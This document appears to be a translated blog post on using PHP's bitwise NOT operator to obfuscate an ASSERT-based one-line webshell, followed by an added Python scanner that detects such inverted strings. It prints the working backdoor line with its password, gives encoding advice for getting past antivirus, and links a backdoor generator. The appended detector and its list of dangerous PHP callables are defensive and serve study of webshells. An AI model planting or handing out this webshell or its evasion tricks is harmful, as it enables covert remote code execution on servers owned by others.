Using bitwise inversion (~) in PHP to build a function-call backdoor: an obfuscated backdoor variant
1) The PHP ~ bitwise operator
Some time ago, a foreigner posted something interesting on Twitter: a string that looked like garbled characters which, when executed, output 1337 as normal.
PHP: Bitwise Operators - http://www.php.net/manual/zh/language.operators.bitwise.php
~ $a  Not (bitwise inversion): bits that are 0 in $a are set to 1, and vice versa.
The PHP ini setting error_reporting uses bitwise values, which gives a real example of turning a bit off. To display all errors except notices,
php.ini uses: E_ALL & ~E_NOTICE
This works by first taking the value of E_ALL: 00000000000000000111011111111111
Then taking the value of E_NOTICE: 00000000000000000000000000001000
Then inverting it with ~: 11111111111111111111111111110111
Finally, bitwise AND (&) keeps the bits that are set (1) in both values: 00000000000000000111011111110111
2) Analysis and reproduction
This is what the original code did at the time:
On seeing this, the first thought is that it could be used to build backdoors that bypass firewalls and similar filters; the next question is which encoding is being used.
Later, while testing with Li pujun, I simply ran echo ~'1'; and so on, and the 'garbled' characters above were output directly.
Then we can write a one-line backdoor to try it out:
<?php $x = ~Ÿ¬°«; $x($_POST[~¹Ï]);?>
Here the $x variable is defined as ASSERT and the password is FF0000, so a client can connect to the backdoor directly: bitwise inversion is what produced the 'garbled' characters, so inverting them again returns the normal value.
3) Encoding and antivirus evasion
When I reproduced this backdoor, I found that copying it over directly produced HTTP status 500. The cause is an encoding problem: the 'garbled' characters above are actually Western European (ISO-8859-15).
In practice, we have encountered many backdoors that cannot be connected to. They return error 500 because of encoding problems. If the default encoding cannot be identified, save the file in this encoding (GBK \ UTF8 \... cannot be used successfully).
4) Closing notes
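A detection-side counterpart to sections 2 and 3, as an added example that is not part of the original post: a byte-level scanner that finds `~` applied to a run of high bytes in PHP source, inverts the run, and flags it when the result is a dangerous callable. The names `scan_php`, `invert` and `SUSPICIOUS` and both fixtures are constructed for this example.

```python
import re

# Callables that usually indicate a webshell when invoked through a variable.
# The list is an assumption of this example and is not exhaustive.
SUSPICIOUS = {b"assert", b"eval", b"system", b"exec", b"passthru",
              b"shell_exec", b"popen", b"proc_open", b"create_function"}

# "~" applied to a run of bytes 0x80-0xFF, quoted or bare (the page's
# one-liner writes the bytes unquoted).
INVERTED = re.compile(rb"~\s*(['\"]?)([\x80-\xff]+)\1")


def invert(data: bytes) -> bytes:
    """Flip every bit of every byte, as PHP's ~ does to a string operand."""
    return bytes(b ^ 0xFF for b in data)


def scan_php(source: bytes):
    """Return (offset, decoded, suspicious) for each ~<high bytes> operand.

    Works on raw bytes: decoding the file to text first would apply a
    charset guess and change the very bytes being inspected.
    """
    findings = []
    for m in INVERTED.finditer(source):
        plain = invert(m.group(2))          # bytes >= 0x80 invert to ASCII
        findings.append((m.start(), plain.decode("ascii"),
                         plain.lower() in SUSPICIOUS))
    return findings


# Constructed fixtures. The first mirrors the operands the page names
# (ASSERT and FF0000) but omits the dynamic call; the second is the benign
# php.ini-style expression from section 1 and must not be flagged.
SAMPLE = (b"<?php $x = ~" + invert(b"ASSERT") +
          b"; $k = $_POST[~" + invert(b"FF0000") + b"]; ?>")
BENIGN = b"<?php error_reporting(E_ALL & ~E_NOTICE); ?>"

if __name__ == "__main__":
    for offset, decoded, suspicious in scan_php(SAMPLE):
        print(offset, repr(decoded), "SUSPICIOUS" if suspicious else "review")
    print(scan_php(BENIGN))
```

Read files in binary mode (`open(path, "rb")`) before passing them to `scan_php`, so the bytes reach the scanner unchanged.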
We wrote a small script for easy generation: http://www.bkjia.com/tools/Createbackdoor-1.php
Usage: Createbackdoor-1.php?Pwd=password